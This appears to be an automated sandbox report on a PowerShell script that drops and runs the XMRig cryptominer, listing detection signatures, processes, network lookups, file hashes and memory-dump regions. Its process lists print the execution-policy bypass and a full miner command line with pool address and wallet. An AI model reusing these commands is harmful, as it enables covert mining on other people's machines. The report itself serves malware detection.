memory/1632-139-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-140-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-141-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-142-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-143-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-144-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-145-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-146-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-147-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-148-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-149-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-150-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-151-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-152-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-153-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-154-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-155-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted 2024-05-26 13:33
Reported 2024-05-27 06:29
Platform win10v2004-20240508-en
Max time kernel 1791s
Max time network 1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.163:443 www.bing.com tcp
US 8.8.8.8:53 163.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

memory/3248-0-0x00007FFE97363000-0x00007FFE97365000-memory.dmp

memory/3248-3-0x00000268E86F0000-0x00000268E8712000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cfnwiekg.eu4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3248-11-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/3248-12-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/3248-14-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/3248-15-0x00000268E9590000-0x00000268E95A2000-memory.dmp

memory/3248-16-0x00000268E9570000-0x00000268E957A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1528-47-0x000001B93AE10000-0x000001B93AE30000-memory.dmp

memory/1528-48-0x000001B93AE50000-0x000001B93AE70000-memory.dmp

memory/1528-49-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/3248-50-0x00007FFE97363000-0x00007FFE97365000-memory.dmp

memory/1528-51-0x000001B93AE70000-0x000001B93AE90000-memory.dmp

memory/1528-52-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/3248-53-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/1528-54-0x000001B93AE90000-0x000001B93AEB0000-memory.dmp

memory/3248-55-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/1528-56-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-58-0x000001B93AE70000-0x000001B93AE90000-memory.dmp

memory/1528-57-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-59-0x000001B93AE90000-0x000001B93AEB0000-memory.dmp

memory/1528-60-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-61-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-62-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-63-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-64-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-65-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-66-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-67-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-68-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-69-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-70-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-71-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-72-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-73-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-74-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-75-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-76-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-77-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-78-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-79-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-80-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-81-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-82-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-83-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-84-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-85-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-86-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-87-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-88-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-89-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-90-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-91-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-92-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-93-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-94-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-95-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-96-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-97-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-98-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-99-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-100-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-101-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-102-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-103-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-104-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-105-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-106-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-107-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-108-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-109-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-110-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-111-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-112-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-113-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-114-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-115-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-116-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-117-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-118-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted 2024-05-26 13:33
Reported 2024-05-27 06:38
Platform win10v2004-20240508-en
Max time kernel 1795s
Max time network 1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1036,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=3916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1644,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=3944 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 3.17.178.52.in-addr.arpa udp

Files

memory/1492-0-0x00007FFE9C853000-0x00007FFE9C855000-memory.dmp

memory/1492-10-0x0000026E13270000-0x0000026E13292000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kb0hjamg.wg5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1492-11-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/1492-12-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/1492-14-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/1492-15-0x0000026E132E0000-0x0000026E132F2000-memory.dmp

memory/1492-16-0x0000026E131E0000-0x0000026E131EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4172-47-0x0000029AE8820000-0x0000029AE8840000-memory.dmp

memory/4172-48-0x0000029AE8A90000-0x0000029AE8AB0000-memory.dmp

memory/4172-49-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-51-0x0000029B7CE10000-0x0000029B7CE30000-memory.dmp

memory/4172-50-0x0000029AE8AB0000-0x0000029AE8AD0000-memory.dmp

memory/1492-53-0x00007FFE9C853000-0x00007FFE9C855000-memory.dmp

memory/4172-52-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/1492-54-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/4172-55-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/1492-56-0x00007FFE9C850000-0x00007FFE9D311000-memory.dmp

memory/4172-59-0x0000029B7CE10000-0x0000029B7CE30000-memory.dmp

memory/4172-58-0x0000029AE8AB0000-0x0000029AE8AD0000-memory.dmp

memory/4172-57-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-60-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-61-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-62-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-63-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-64-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-65-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-66-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-67-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-68-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-69-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-70-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-71-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-72-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-73-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-74-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-75-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-76-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-77-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-78-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-79-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-80-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-81-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-82-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-83-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-84-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-85-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-86-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-87-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-88-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-89-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-90-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-91-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-92-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-93-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-94-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-95-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-96-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-97-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-98-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-99-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-100-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-101-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-102-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-103-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-104-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-105-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-106-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-107-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-108-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-109-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-110-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-111-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-112-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-113-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-114-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-115-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-116-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-117-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

memory/4172-118-0x00007FF6DB1D0000-0x00007FF6DBE03000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:38

Platform

win11-20240426-en

Max time kernel

1793s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2380-0-0x00007FF863373000-0x00007FF863375000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wcwoxbfd.kgp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2380-1-0x00000263C8550000-0x00000263C8572000-memory.dmp

memory/2380-10-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2380-11-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2380-12-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2380-14-0x00000263E0BD0000-0x00000263E0BE2000-memory.dmp

memory/2380-15-0x00000263E0AC0000-0x00000263E0ACA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2792-46-0x0000019C6B7B0000-0x0000019C6B7D0000-memory.dmp

memory/2792-47-0x0000019C6B7F0000-0x0000019C6B810000-memory.dmp

memory/2792-48-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2380-50-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2380-49-0x00007FF863373000-0x00007FF863375000-memory.dmp

memory/2792-53-0x0000019C6B830000-0x0000019C6B850000-memory.dmp

memory/2792-51-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-52-0x0000019C6B810000-0x0000019C6B830000-memory.dmp

memory/2380-54-0x00007FF863370000-0x00007FF863E32000-memory.dmp

memory/2792-55-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-56-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-58-0x0000019C6B830000-0x0000019C6B850000-memory.dmp

memory/2792-57-0x0000019C6B810000-0x0000019C6B830000-memory.dmp

memory/2792-59-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-60-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-61-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-62-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-63-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-64-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-65-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-66-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-67-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-68-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-69-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-70-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

